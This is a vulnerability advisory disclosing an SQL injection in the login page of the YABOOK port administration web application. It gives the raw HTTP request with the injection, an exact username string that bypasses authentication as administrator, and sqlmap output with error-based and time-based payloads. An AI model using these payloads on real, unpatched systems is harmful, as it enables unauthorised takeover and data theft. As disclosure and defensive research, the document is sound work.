SQL injection in YABOOK port administration allows authentication bypass

YABOOK is a web-based software by News-Solutions for managing wharves in ports. Hosting of the solution is usually done via a service provider or it is self-hosted by the ports. During a security investigation, Pentagrid discovered an SQL injection in the login mask of the web application, which enabled authentication bypass. This security issue has been resolved.

Timeline

  • 2023-12-13: Initial contact with the manufacturer and initial advisory sent.

  • 2023-12-13: Verified fix is present in version 6.61.

  • 2024-02-13: CVE-ID requested.

  • 2024-03-12: Deadline for publication after 90 days.

1. SQL injection in the port administration software YABOOK

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, 9.8 Critical

Affected Components

Pentagrid identified the vulnerability in the following versions of YABOOK in the on-prem version during a penetration test. Other versions are possibly affected as well.

  • Version 3.43

  • Version 5.80

Summary

The YABOOK web application has an SQL injection vulnerability on the login page that can be exploited by unauthenticated persons in the network or via Internet.

Impact

Authentication can be bypassed. The administrator account can be taken over. The application can be completely compromised with SQL injections. All application data can be read and manipulated. Reading out and determining passwords can also affect other applications if passwords are reused.

Technical Details

Both tested versions are affected by an SQL injection in the username field when processing login data. An error message occurs when entering odd numbers of quotation marks, as the following example query shows:

POST /kasse/ HTTP/1.1
Host: XX.XX.XX.XX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Origin: http://XX.XX.XX.XX
DNT: 1
Connection: close
Referer: http://XX.XX.XX.XX/kasse/
Cookie: Kasse=fnba5lhg04ib7e6v3qqk81gu05
Upgrade-Insecure-Requests: 1

username=administrator%27%29+OR+1%3D1&password=asd&submit=Login

This HTTP request results in the following HTTP response:

HTTP/1.1 200 OK
Date: [...]
Server: [...]
X-Powered-By: [...]
Expires: [...]
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4613
Connection: close
Content-Type: text/html

 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
     "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Hafenverwaltung - YABOOK</title>

[...]

</div>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') AND (password='7815696ecbf1c96e6894b779456d330e')' at line 1<div class=error>Benutzername oder Passwort falsch!</div>

Web applications often use an SQL query to validate a login. A query requests the database for entries matching the provided login data. If the result of the query is greater than zero, access is granted. Such queries can be exploited if the site is affected by an SQL injection vulnerability. By manipulating the query the result will always be greater than zero, regardless of the entered password. This is also the case with YABOOK. If the character string admin'' OR ('1'='1 is entered as the user name, together with any password, the user is automatically logged in as an administrator.

The vulnerability was also detectable using Sqlmap and the database backend was identified, as the following excerpt shows:

[13:32:53] [INFO] resuming back-end DBMS 'mysql'
[13:32:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: username=administrator') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170767671,(SELECT (ELT(2508=2508,1))),0x716b6b7071,0x78))s), 8446744073709551610, 8446744073709551610)))-- xddc&password=&submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=administrator') AND (SELECT 5783 FROM (SELECT(SLEEP(5)))dTQF)-- jOzA&password=&submit=Login
---
[13:32:53] [INFO] the back-end DBMS is MySQL
[13:32:53] [INFO] fetching banner
[13:32:53] [INFO] resumed: [...]
web server operating system: Linux Debian [...]
web application technology: [...]
back-end DBMS: MySQL >= 5.5
banner: [...]

Using Sqlmap, it was also possible to read password hashes of user accounts. These are MD5 hashes of the passwords without any further salt value. This simplifies a brute force attack on the hashes. MD5 hashes can be generated efficiently and thus tried out, which is why it is considered unsafe to hash passwords using this algorithm.

Precondition

An attacker needs access to the network and must be able to reach the web application on the network. This is not necessary if the application is also accessible from the Internet, which is the case for some ports in Germany.

Recommendation

Recommendation for the vendor:

  • The vulnerability should be addressed and further security analysis conducted.

  • Send a generic error message instead of error messages for incorrect SQL syntax.

  • Inform affected customers.

Recommendation for users:

  • Switch to a current version of the software. According to Pentagrid tests, version 6.61 is free of the problem.

Credits

This vulnerability has been found by Ole Diederich (Pentagrid).